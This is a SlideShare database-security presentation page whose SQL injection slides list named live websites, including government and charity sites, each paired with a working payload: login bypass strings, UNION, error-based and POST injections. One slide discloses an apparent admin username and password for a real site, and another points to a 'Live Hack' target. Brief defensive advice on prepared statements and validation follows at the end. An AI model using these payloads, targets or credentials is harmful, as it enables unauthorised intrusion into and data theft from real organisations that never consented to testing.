SlideShare ist ein Scribd-Unternehmen logo

Database and Database Security..

Als PPTX, PDF herunterladen
Rehan Manzoor
Rehan Manzoor

Database and Database Security..

Technologie
1 von 32
DATABASE & DATABASE SECURITY BY REHAN MANZOOR
What actually is a database  Code and Filing concept +
History of Database
Major Database Vendors
Interaction with Database
How we Interact (Direct Queries)
Custom defined functions
Stored Procedures
Stored Procedures
Integration with Languages
Static Apps
Dynamic Apps
Need in CMS
How We Integrate  Well that is the real question how we integrate.. It create a problem when we don‘t attach app with a database correctly.. Code is important
Contents continued..  Database Attacks  What is a Database Attack  Explanation  OWASP Rating (damage rate)  Destruction of SQL injection  History Reviews  Recent bidding in underground
Database Attacks  Excessive Privileges  Privileges abuse  Unauthorized privilege elevation  Platform Vulnerabilities  Sql Injection  Weak Audit  Denial of Service
Top 10 vuln by OWASP
Destruction of SQL Injection Attack  Heartland Payment Systems This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.  TJX More than 45 million people had their credit card details stolen and some experts said the actual figure was likely to be closer to 94 million.
Recent Bidding in Underground
Login on Live Sites  http://www.equinet.ch/fr/gestion/login.php  1' OR '1'='1  http://lionsclubofwashim.co.in/admin.php  1' OR '1'='1  admin.axilbusiness.in  1' OR '1'='1  http://www.anemos.in/admin/  1' OR '1'='1  Query Code  CODE select username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
Union based attack  http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,nul l-- -  http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables—  http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null –  Code select * from tblName where id=‗‖+RequestQueryString[‗id‘]+‖‘;
Error Based Attack  http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -  http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2  http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown  http://www.grabbbit.com/admin/login.aspx  userid admin  password grabbbit$  Code  Select column1,column2,column3, from table1 join table2 on table1.column1 = table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;
Blind Attack  fgcineplex.com.sg/Images/slideshow/sizzlings oul.php  Code well query is same here like union but problem is with labels here.. Their designer could are not picked.. Either they are also stored in database or they they cannot work with union
POST Sql Injection  url:  http://haryanapolice.gov.in/police/pressreleases/s earch.asp  Post  text1=rummy'&text2=11/11/2010&SUBMIT=search  Code select * from tablename where text1= Request.Form[―text1"].ToString() and text2= Request.Form[―text1"].ToString();
Why Sql Injection Possible  Who is responsible Database or Programmer  Why Not To Blame Database  Database Secure Nature  Lack of awareness  No research base study  Lack of interest  Non professional coders
Detection of SQL Injection  Manual Check  Why  How  By Whom  Automated Check  Tools  Scanners
Securing From SQL Injection  Learn About it  Firewalls  By Code  Don‘t Disclose any parameter as possible  Giving session user least possible rights  Blacklisting evil keywords for the session user  User input validation  Using prepared statements
More on Firewalls  USE Of Firewall  As it is  Customized  Buffer overflows  Null bytes  Difference between a normal user and Hacker
Buffer Overflows  Live example  https://www.qmensolutions.com/remote_suppo rt_packs.php?packs=9%27--%20-  Bypassing from keyword
Live Hack Of A Website  http://aquaservices.co.in/
Conclusion  Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.

Empfohlen

Database security and privacy
Database security and privacyDatabase security and privacy
Database security and privacyMd. Ahasan Hasib
 
Database Security
Database SecurityDatabase Security
Database Securityalraee
 
DBMS SECURITY
DBMS SECURITYDBMS SECURITY
DBMS SECURITYWasim Raza
 
Database security
Database securityDatabase security
Database securitykeerthusandeepreddy
 
Database security
Database securityDatabase security
Database securityPrabhat gangwar
 
Database Security
Database SecurityDatabase Security
Database SecurityShingalaKrupa
 
Database security
Database securityDatabase security
Database securityArpana shree
 
Distributed database security with discretionary access control
Distributed database security with discretionary access controlDistributed database security with discretionary access control
Distributed database security with discretionary access controlJyotishkar Dey
 

Empfohlen

Database security and privacy
Database security and privacyDatabase security and privacy
Database security and privacyMd. Ahasan Hasib
 
Database Security
Database SecurityDatabase Security
Database Securityalraee
 
DBMS SECURITY
DBMS SECURITYDBMS SECURITY
DBMS SECURITYWasim Raza
 
Database security
Database securityDatabase security
Database securitykeerthusandeepreddy
 
Database security
Database securityDatabase security
Database securityPrabhat gangwar
 
Database Security
Database SecurityDatabase Security
Database SecurityShingalaKrupa
 
Database security
Database securityDatabase security
Database securityArpana shree
 
Distributed database security with discretionary access control
Distributed database security with discretionary access controlDistributed database security with discretionary access control
Distributed database security with discretionary access controlJyotishkar Dey
 
Security and Integrity of Data
Security and Integrity of DataSecurity and Integrity of Data
Security and Integrity of DataAdeel Riaz
 
01 database security ent-db
01 database security ent-db01 database security ent-db
01 database security ent-dbuncleRhyme
 
Database Security And Authentication
Database Security And AuthenticationDatabase Security And Authentication
Database Security And AuthenticationSudeb Das
 
Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013Prosanta Ghosh
 
DB security
DB security DB security
DB securityERSHUBHAM TIWARI
 
security and privacy in dbms and in sql database
security and privacy in dbms and in sql databasesecurity and privacy in dbms and in sql database
security and privacy in dbms and in sql databasegourav kottawar
 
Security of the database
Security of the databaseSecurity of the database
Security of the databasePratik Tamgadge
 
Database security
Database securityDatabase security
Database securityBirju Tank
 
Data base security
Data base securityData base security
Data base securitySara Nazir
 
Database security
Database securityDatabase security
Database securityCAS
 
Database modeling and security
Database modeling and securityDatabase modeling and security
Database modeling and securityNeeharika Nidadavolu
 
Chapter 5 database security
Chapter 5 database securityChapter 5 database security
Chapter 5 database securitySyaiful Ahdan
 
Data base security & integrity
Data base security & integrityData base security & integrity
Data base security & integrityPooja Dixit
 
Database security and security in networks
Database security and security in networksDatabase security and security in networks
Database security and security in networksG Prachi
 
Database security
Database securityDatabase security
Database securitySoftware Engineering
 
Database security issues
Database security issuesDatabase security issues
Database security issuesn|u - The Open Security Community
 
Lesson10 Database security
Lesson10 Database security Lesson10 Database security
Lesson10 Database security Muhammad Sikandar Mustafa
 
Security and Integrity
Security and IntegritySecurity and Integrity
Security and Integritylubna19
 
Database Security
Database SecurityDatabase Security
Database SecurityFerdous Pathan
 
Database security
Database securityDatabase security
Database securityMurchana Borah
 
Ch 12 O O D B Dvlpt
Ch 12 O O D B DvlptCh 12 O O D B Dvlpt
Ch 12 O O D B Dvlptguest8fdbdd
 
Database Life Cycle
Database Life CycleDatabase Life Cycle
Database Life CycleHarshendu Desai
 

Weitere ähnliche Inhalte

Was ist angesagt?

Security and Integrity of Data
Security and Integrity of DataSecurity and Integrity of Data
Security and Integrity of DataAdeel Riaz
 
01 database security ent-db
01 database security ent-db01 database security ent-db
01 database security ent-dbuncleRhyme
 
Database Security And Authentication
Database Security And AuthenticationDatabase Security And Authentication
Database Security And AuthenticationSudeb Das
 
Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013Prosanta Ghosh
 
security and privacy in dbms and in sql database
security and privacy in dbms and in sql databasesecurity and privacy in dbms and in sql database
security and privacy in dbms and in sql databasegourav kottawar
 
Security of the database
Security of the databaseSecurity of the database
Security of the databasePratik Tamgadge
 
Database security
Database securityDatabase security
Database securityBirju Tank
 
Data base security
Data base securityData base security
Data base securitySara Nazir
 
Database security
Database securityDatabase security
Database securityCAS
 
Chapter 5 database security
Chapter 5 database securityChapter 5 database security
Chapter 5 database securitySyaiful Ahdan
 
Data base security & integrity
Data base security & integrityData base security & integrity
Data base security & integrityPooja Dixit
 
Database security and security in networks
Database security and security in networksDatabase security and security in networks
Database security and security in networksG Prachi
 
Security and Integrity
Security and IntegritySecurity and Integrity
Security and Integritylubna19
 

Was ist angesagt? (20)

Security and Integrity of Data
Security and Integrity of DataSecurity and Integrity of Data
Security and Integrity of Data
 
01 database security ent-db
01 database security ent-db01 database security ent-db
01 database security ent-db
 
Database Security And Authentication
Database Security And AuthenticationDatabase Security And Authentication
Database Security And Authentication
 
Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013Dbms ii mca-ch12-security-2013
Dbms ii mca-ch12-security-2013
 
DB security
DB security DB security
DB security
 
security and privacy in dbms and in sql database
security and privacy in dbms and in sql databasesecurity and privacy in dbms and in sql database
security and privacy in dbms and in sql database
 
Security of the database
Security of the databaseSecurity of the database
Security of the database
 
Database security
Database securityDatabase security
Database security
 
Data base security
Data base securityData base security
Data base security
 
Database security
Database securityDatabase security
Database security
 
Database modeling and security
Database modeling and securityDatabase modeling and security
Database modeling and security
 
Chapter 5 database security
Chapter 5 database securityChapter 5 database security
Chapter 5 database security
 
Data base security & integrity
Data base security & integrityData base security & integrity
Data base security & integrity
 
Database security and security in networks
Database security and security in networksDatabase security and security in networks
Database security and security in networks
 
Database security
Database securityDatabase security
Database security
 
Database security issues
Database security issuesDatabase security issues
Database security issues
 
Lesson10 Database security
Lesson10 Database security Lesson10 Database security
Lesson10 Database security
 
Security and Integrity
Security and IntegritySecurity and Integrity
Security and Integrity
 
Database Security
Database SecurityDatabase Security
Database Security
 
Database security
Database securityDatabase security
Database security
 

Andere mochten auch

Ch 12 O O D B Dvlpt
Ch 12 O O D B DvlptCh 12 O O D B Dvlpt
Ch 12 O O D B Dvlptguest8fdbdd
 
Database Systems Security
Database Systems SecurityDatabase Systems Security
Database Systems Securityamiable_indian
 
CBSE XII Database Concepts And MySQL Presentation
CBSE XII Database Concepts And MySQL PresentationCBSE XII Database Concepts And MySQL Presentation
CBSE XII Database Concepts And MySQL PresentationGuru Ji
 
Data base management system
Data base management systemData base management system
Data base management systemNavneet Jingar
 
Database Design Slide 1
Database Design Slide 1Database Design Slide 1
Database Design Slide 1ahfiki
 
Database Management Systems (DBMS)
Database Management Systems (DBMS)Database Management Systems (DBMS)
Database Management Systems (DBMS)Dimara Hakim
 
Database management system
Database management systemDatabase management system
Database management systemRizwanHafeez
 
My Top 10 slides on presentations
My Top 10 slides on presentationsMy Top 10 slides on presentations
My Top 10 slides on presentationsAlexei Kapterev
 
Database administrator
Database administratorDatabase administrator
Database administratorTech_MX
 

Andere mochten auch (20)

Ch 12 O O D B Dvlpt
Ch 12 O O D B DvlptCh 12 O O D B Dvlpt
Ch 12 O O D B Dvlpt
 
Database Life Cycle
Database Life CycleDatabase Life Cycle
Database Life Cycle
 
Database Systems Security
Database Systems SecurityDatabase Systems Security
Database Systems Security
 
Database management system basic, database, database management, learn databa...
Database management system basic, database, database management, learn databa...Database management system basic, database, database management, learn databa...
Database management system basic, database, database management, learn databa...
 
MySQL
MySQLMySQL
MySQL
 
Introduction to Mysql
Introduction to MysqlIntroduction to Mysql
Introduction to Mysql
 
CBSE XII Database Concepts And MySQL Presentation
CBSE XII Database Concepts And MySQL PresentationCBSE XII Database Concepts And MySQL Presentation
CBSE XII Database Concepts And MySQL Presentation
 
MySql slides (ppt)
MySql slides (ppt)MySql slides (ppt)
MySql slides (ppt)
 
Data base management system
Data base management systemData base management system
Data base management system
 
Database Design Slide 1
Database Design Slide 1Database Design Slide 1
Database Design Slide 1
 
Dbms
DbmsDbms
Dbms
 
Database Management Systems (DBMS)
Database Management Systems (DBMS)Database Management Systems (DBMS)
Database Management Systems (DBMS)
 
Database management system
Database management systemDatabase management system
Database management system
 
Data Base Management System
Data Base Management SystemData Base Management System
Data Base Management System
 
Introduction to database
Introduction to databaseIntroduction to database
Introduction to database
 
Cloud History 101
Cloud History 101Cloud History 101
Cloud History 101
 
My Top 10 slides on presentations
My Top 10 slides on presentationsMy Top 10 slides on presentations
My Top 10 slides on presentations
 
Database administrator
Database administratorDatabase administrator
Database administrator
 
Database Development Process
Database Development ProcessDatabase Development Process
Database Development Process
 
Dbms slides
Dbms slidesDbms slides
Dbms slides
 

Ähnlich wie Database and Database Security..

Sql injection
Sql injection Sql injection
Sql injection Aaron Hill
 
Data base security and injection
Data base security and injectionData base security and injection
Data base security and injectionA. Shamel
 
SQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmSQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmIOSR Journals
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachJeff Prom
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)mikemcbryde
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsMark Ginnebaugh
 
Keeping Private Data Private
Keeping Private Data PrivateKeeping Private Data Private
Keeping Private Data PrivateDobler Consulting
 
8 sql injection
8 sql injection8 sql injection
8 sql injectiondrewz lin
 
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...Rana sing
 
Final review ppt
Final review pptFinal review ppt
Final review pptRana sing
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sqlKaustav Sengupta
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityMichael Coates
 
Web security presentation
Web security presentationWeb security presentation
Web security presentationJohn Staveley
 
Hacking databases
Hacking databasesHacking databases
Hacking databasessunil kumar
 

Ähnlich wie Database and Database Security.. (20)

Sql injection
Sql injection Sql injection
Sql injection
 
Data base security and injection
Data base security and injectionData base security and injection
Data base security and injection
 
E017131924
E017131924E017131924
E017131924
 
SQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive AlgorithmSQL Injection Prevention by Adaptive Algorithm
SQL Injection Prevention by Adaptive Algorithm
 
SQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington BeachSQL Injections - 2016 - Huntington Beach
SQL Injections - 2016 - Huntington Beach
 
Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)Application Security 101 (OWASP DC)
Application Security 101 (OWASP DC)
 
SQL injection
SQL injectionSQL injection
SQL injection
 
Think Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack VectorsThink Like a Hacker - Database Attack Vectors
Think Like a Hacker - Database Attack Vectors
 
Keeping Private Data Private
Keeping Private Data PrivateKeeping Private Data Private
Keeping Private Data Private
 
8 sql injection
8 sql injection8 sql injection
8 sql injection
 
Securing Applications
Securing ApplicationsSecuring Applications
Securing Applications
 
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff...
 
Final review ppt
Final review pptFinal review ppt
Final review ppt
 
Greensql2007
Greensql2007Greensql2007
Greensql2007
 
Code injection and green sql
Code injection and green sqlCode injection and green sql
Code injection and green sql
 
Devbeat Conference - Developer First Security
Devbeat Conference - Developer First SecurityDevbeat Conference - Developer First Security
Devbeat Conference - Developer First Security
 
Web security presentation
Web security presentationWeb security presentation
Web security presentation
 
PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
 
Web application security
Web application securityWeb application security
Web application security
 
Hacking databases
Hacking databasesHacking databases
Hacking databases
 

Kürzlich hochgeladen

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Neo4j
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Enterprise Knowledge
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 

Kürzlich hochgeladen (20)

Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
 
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
Workshop - Best of Both Worlds_ Combine KG and Vector search for enhanced R...
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...Driving Behavioral Change for Information Management through Data-Driven Gree...
Driving Behavioral Change for Information Management through Data-Driven Gree...
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
 
CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 

Database and Database Security..

  • 1.
  • 3. What actually is a database  Code and Filing concept +
  • 7. How we Interact (Direct Queries)
  • 15. How We Integrate  Well that is the real question how we integrate.. It create a problem when we don‘t attach app with a database correctly.. Code is important
  • 16. Contents continued..  Database Attacks  What is a Database Attack  Explanation  OWASP Rating (damage rate)  Destruction of SQL injection  History Reviews  Recent bidding in underground
  • 17. Database Attacks  Excessive Privileges  Privileges abuse  Unauthorized privilege elevation  Platform Vulnerabilities  Sql Injection  Weak Audit  Denial of Service
  • 18. Top 10 vuln by OWASP
  • 19. Destruction of SQL Injection Attack  Heartland Payment Systems This New Jersey payment processing firm lost data on tens of millions of credit cards in an attack in 2009. Around 175,000 businesses were affected by the theft.  TJX More than 45 million people had their credit card details stolen and some experts said the actual figure was likely to be closer to 94 million.
  • 20. Recent Bidding in Underground
  • 21. Login on Live Sites  http://www.equinet.ch/fr/gestion/login.php  1' OR '1'='1  http://lionsclubofwashim.co.in/admin.php  1' OR '1'='1  admin.axilbusiness.in  1' OR '1'='1  http://www.anemos.in/admin/  1' OR '1'='1  Query Code  CODE select username, password from admin where username='"+txtUserName.Text+"' and password='"+txtPassword.Text+"';
  • 22. Union based attack  http://greenforce.com.pk/page.aspx?page_id=24 +UNION+ALL+SELECT+null,null,@@version,null,null,null,nul l-- -  http://www.philatourism.com/page.aspx?id=-3 UNION ALL SELECT table_name,null,null,null,null,null from information_schema.tables—  http://www.sharan.org.uk/newsdetail.aspx?ID=-7 union all select '1',null –  Code select * from tblName where id=‗‖+RequestQueryString[‗id‘]+‖‘;
  • 23. Error Based Attack  http://www.vdjs.edu.in/CMS/ContentPage.aspx?id=21 and @@version>1-- -  http://www.mission-education.org/resourcelist.cfm?audience_ID=5 and 1=convert(int,@@version)-- -&category_id=2  http://www.grabbbit.com/Product.aspx?console_id=3' and 1=convert(int,(select top 1 column_name from information_schema.columns where table_name='adminlogin' and column_name not in ('id','userid','password','admin_role_id')))--&type=Preown  http://www.grabbbit.com/admin/login.aspx  userid admin  password grabbbit$  Code  Select column1,column2,column3, from table1 join table2 on table1.column1 = table2.column1 where id=‗‖+RequestQueryString[‗id‘]+‖‘;
  • 24. Blind Attack  fgcineplex.com.sg/Images/slideshow/sizzlings oul.php  Code well query is same here like union but problem is with labels here.. Their designer could are not picked.. Either they are also stored in database or they they cannot work with union
  • 25. POST Sql Injection  url:  http://haryanapolice.gov.in/police/pressreleases/s earch.asp  Post  text1=rummy'&text2=11/11/2010&SUBMIT=search  Code select * from tablename where text1= Request.Form[―text1"].ToString() and text2= Request.Form[―text1"].ToString();
  • 26. Why Sql Injection Possible  Who is responsible Database or Programmer  Why Not To Blame Database  Database Secure Nature  Lack of awareness  No research base study  Lack of interest  Non professional coders
  • 27. Detection of SQL Injection  Manual Check  Why  How  By Whom  Automated Check  Tools  Scanners
  • 28. Securing From SQL Injection  Learn About it  Firewalls  By Code  Don‘t Disclose any parameter as possible  Giving session user least possible rights  Blacklisting evil keywords for the session user  User input validation  Using prepared statements
  • 29. More on Firewalls  USE Of Firewall  As it is  Customized  Buffer overflows  Null bytes  Difference between a normal user and Hacker
  • 30. Buffer Overflows  Live example  https://www.qmensolutions.com/remote_suppo rt_packs.php?packs=9%27--%20-  Bypassing from keyword
  • 31. Live Hack Of A Website  http://aquaservices.co.in/
  • 32. Conclusion  Although databases and their contents are vulnerable to a host of internal and external threats, it is possible to reduce the attack vectors to near zero. By addressing these threats you will meet the requirements of the most regulated industries in the world.